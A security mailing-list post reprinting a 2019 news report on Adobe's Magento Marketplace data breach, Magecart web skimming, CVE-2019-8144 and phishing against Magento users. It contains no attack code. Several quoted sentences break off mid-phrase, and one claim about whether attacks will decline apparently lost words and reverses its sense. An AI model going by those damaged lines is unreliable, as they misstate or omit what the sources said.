[BreachExchange] Magento Marketplace Suffers Data Breach, Adobe Warns

Destry Winant destry at riskbasedsecurity.com
Tue Dec 3 10:06:59 EST 2019


The Magento Marketplace application store suffered a breach that
exposed user data, software giant Adobe Systems warns.

Magento is one of the world's most widely used e-commerce platforms.

Adobe says it identified a vulnerability in the e-commerce marketplace
on Nov. 21, which was exploited by an "unauthorized third party" to
access "account information related to Magento Marketplace account
holders," according to an email advisory. The advisory was posted by
some users on Twitter.

The exposed data included names, email addresses, usernames - aka
MageIDs - as well as billing and shipping addresses, phone numbers and
"limited commercial information (percentages for payments to

The advisory adds: "This issue did not affect the operation of any
Magento core products or services," and Adobe said the exploited flaw
was "quickly fixed."

Adobe did not say how many users' data was exposed or how long the
data breach lasted. Affected users are being contacted by email.

Adobe did not immediately respond to further questions from
Information Security Media Group submitted late on Thursday.

Web Skimming

Magento, which was acquired by Adobe last year for $1.7 billion, is
one of the most popular e-commerce platforms. A 2017 year in review
published by Magento said it was being used by 250,000 merchants.

As with any software designed to handle financial transactions,
Magento has been persistently targeted by cybercriminals, including by
Magecart, which is an umbrella term used to describe groups of
attackers that regularly tamper with systems to steal payment card
data (see Magecart Group Continues Targeting E-Commerce Sites).

Magecart attacks against Magento continue to escalate. In May, the
security vendor RiskIQ wrote that it had detected "some of the most
significant Magecart attacks ever carried out."

Yonathan Klijnsma, a threat researcher with RiskIQ, writes that
e-commerce shops running Magento are the prime target for groups
running web skimming - aka digital skimming - attacks. Such attacks
typically involve exploiting vulnerabilities or outdated software to
install malicious code that collects payment card details and sends
them to a remote server, for later retrieval by attackers.

Attackers quickly abuse new flaws that come to light in Magento.
Earlier this month, for example, Magento warned of a serious remote
code execution vulnerability, designated CVE-2019-8144.

"Merchants running Magento Commerce 2.3.x should install the latest
security update to help protect their stores from potential malicious
attacks that could exploit a vulnerability in preview methods,"
Magento's security advisory reads. "This vulnerability could enable an
unauthenticated user to insert a malicious payload into a merchant's
site and execute it, which is why we recommend installing this

The vulnerability was so serious that Magento added additional
defenses to try and prevent attackers from exploiting the flaw. Those
changes meant that administrators couldn't view previews for products,
or for blocks or dynamic blocks, which allow developers to show
certain content to specific audience segment.

E-Commerce Attacks Continue

Klijnsma says that the volume of attacks being directed at Magento or
other major e-commerce platforms - including Shopify, OpenCart and
OSCommerce - will decline anytime soon.

"Businesses need a continued focus on visibility into their
internet-facing attack surfaces, as well as scrutinize of the
third-party services that constitute their web applications," he
writes. "Magecart's recent ravages have shown that a lot of the
investment in securing corporate infrastructure hasn't worked.
Companies will continue to be overwhelmed by the scale and tenacity of
these kinds of groups, especially as attacks launch from outside the
firewall and the data theft occurs in the user's browser."

Warning: Phishing Attacks

Unfortunately, the type of data leaked in the breach that Adobe
detected on Nov. 21 could be put to us by attackers, for example, to
launch repeat phishing attacks against Magento users.

Earlier this year, the Magento security team issued a warning about
active phishing campaigns.

"We are aware of reports that phishing attempts are impersonating
Magento and are being used for targeted attacks," the advisory says.
"This misleading phishing email encourages users to click on a link
that indicates all users are required to register for an alert

The alert advised users to check email headers to ensure an email
actually came from Magento, be on the lookout for grammatical errors
and to analyze any URLs included in the content to spot potential
oddities. The security team also warned users to never install zip
files or and other attachments included with purported emails from

More information about the BreachExchange mailing list